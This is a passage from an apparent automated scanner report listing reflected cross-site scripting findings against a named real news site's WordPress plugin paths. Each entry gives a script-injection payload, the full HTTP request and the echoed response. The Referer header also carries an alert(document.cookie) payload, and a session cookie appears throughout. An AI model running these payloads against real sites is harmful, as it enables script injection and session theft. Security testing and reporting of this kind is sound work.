Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a6aa"><script>alert(1)</script>84c0efbbd58 was submitted in the REST URL parameter 7. This input was echoed as 8a6aa\"><script>alert(1)</script>84c0efbbd58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css8a6aa"><script>alert(1)</script>84c0efbbd58?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:18:52 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:18:52 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css8a6aa\"><script>alert(1)</script>84c0efbbd58?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.203. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c399a"><script>alert(1)</script>9ef6eff5d83 was submitted in the REST URL parameter 1. This input was echoed as c399a\"><script>alert(1)</script>9ef6eff5d83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentc399a"><script>alert(1)</script>9ef6eff5d83/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:09:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:10:01 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:10:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-contentc399a\"><script>alert(1)</script>9ef6eff5d83/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.204. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc71c"><script>alert(1)</script>517800f4c48 was submitted in the REST URL parameter 2. This input was echoed as cc71c\"><script>alert(1)</script>517800f4c48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginscc71c"><script>alert(1)</script>517800f4c48/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:11:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:06 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginscc71c\"><script>alert(1)</script>517800f4c48/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.205. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70f33"><script>alert(1)</script>bc17fb5e154 was submitted in the REST URL parameter 3. This input was echoed as 70f33\"><script>alert(1)</script>bc17fb5e154 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/cool-ryan-easy-popups70f33"><script>alert(1)</script>bc17fb5e154/lib/js/jquery-ui-effects.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:11 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:11 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/cool-ryan-easy-popups70f33\"><script>alert(1)</script>bc17fb5e154/lib/js/jquery-ui-effects.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.206. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce178"><script>alert(1)</script>a0d1146d619 was submitted in the REST URL parameter 4. This input was echoed as ce178\"><script>alert(1)</script>a0d1146d619 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/cool-ryan-easy-popups/libce178"><script>alert(1)</script>a0d1146d619/js/jquery-ui-effects.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:13:46 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:13:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/cool-ryan-easy-popups/libce178\"><script>alert(1)</script>a0d1146d619/js/jquery-ui-effects.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.207. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8b1c"><script>alert(1)</script>de42c732ebf was submitted in the REST URL parameter 5. This input was echoed as c8b1c\"><script>alert(1)</script>de42c732ebf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/cool-ryan-easy-popups/lib/jsc8b1c"><script>alert(1)</script>de42c732ebf/jquery-ui-effects.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:17 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:30 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/cool-ryan-easy-popups/lib/jsc8b1c\"><script>alert(1)</script>de42c732ebf/jquery-ui-effects.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.208. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f74"><script>alert(1)</script>1b4497e2e22 was submitted in the REST URL parameter 6. This input was echoed as b6f74\"><script>alert(1)</script>1b4497e2e22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.jsb6f74"><script>alert(1)</script>1b4497e2e22?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:17:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:14 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.jsb6f74\"><script>alert(1)</script>1b4497e2e22?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.209. http://starscene.dailystar.com.lb/wp-content/plugins/dd-formmailer/dd-formmailer.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/dd-formmailer/dd-formmailer.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1da61"><script>alert(1)</script>e7e997dd165 was submitted in the REST URL parameter 1. This input was echoed as 1da61\"><script>alert(1)</script>e7e997dd165 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content1da61"><script>alert(1)</script>e7e997dd165/plugins/dd-formmailer/dd-formmailer.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:39 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content1da61\"><script>alert(1)</script>e7e997dd165/plugins/dd-formmailer/dd-formmailer.css'; }); return true;" >
...[SNIP]...

4.210. http://starscene.dailystar.com.lb/wp-content/plugins/dd-formmailer/dd-formmailer.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/dd-formmailer/dd-formmailer.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a69a"><script>alert(1)</script>d0caedefa3d was submitted in the REST URL parameter 2. This input was echoed as 4a69a\"><script>alert(1)</script>d0caedefa3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins4a69a"><script>alert(1)</script>d0caedefa3d/dd-formmailer/dd-formmailer.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:14:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:19 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins4a69a\"><script>alert(1)</script>d0caedefa3d/dd-formmailer/dd-formmailer.css'; }); return true;" >
...[SNIP]...

4.211. http://starscene.dailystar.com.lb/wp-content/plugins/dd-formmailer/dd-formmailer.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/dd-formmailer/dd-formmailer.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1cd7"><script>alert(1)</script>395a570d334 was submitted in the REST URL parameter 3. This input was echoed as d1cd7\"><script>alert(1)</script>395a570d334 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/dd-formmailerd1cd7"><script>alert(1)</script>395a570d334/dd-formmailer.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:16:02 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:16:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/dd-formmailerd1cd7\"><script>alert(1)</script>395a570d334/dd-formmailer.css'; }); return true;" >
...[SNIP]...

4.212. http://starscene.dailystar.com.lb/wp-content/plugins/dd-formmailer/dd-formmailer.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/dd-formmailer/dd-formmailer.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd360"><script>alert(1)</script>89ea21377c7 was submitted in the REST URL parameter 4. This input was echoed as fd360\"><script>alert(1)</script>89ea21377c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/dd-formmailer/dd-formmailer.cssfd360"><script>alert(1)</script>89ea21377c7 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:17:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:33 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/dd-formmailer/dd-formmailer.cssfd360\"><script>alert(1)</script>89ea21377c7'; }); return true;" >
...[SNIP]...

4.213. http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/fbconnect.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/fbconnect/fbconnect.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9fce"><script>alert(1)</script>061b055854c was submitted in the REST URL parameter 1. This input was echoed as d9fce\"><script>alert(1)</script>061b055854c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

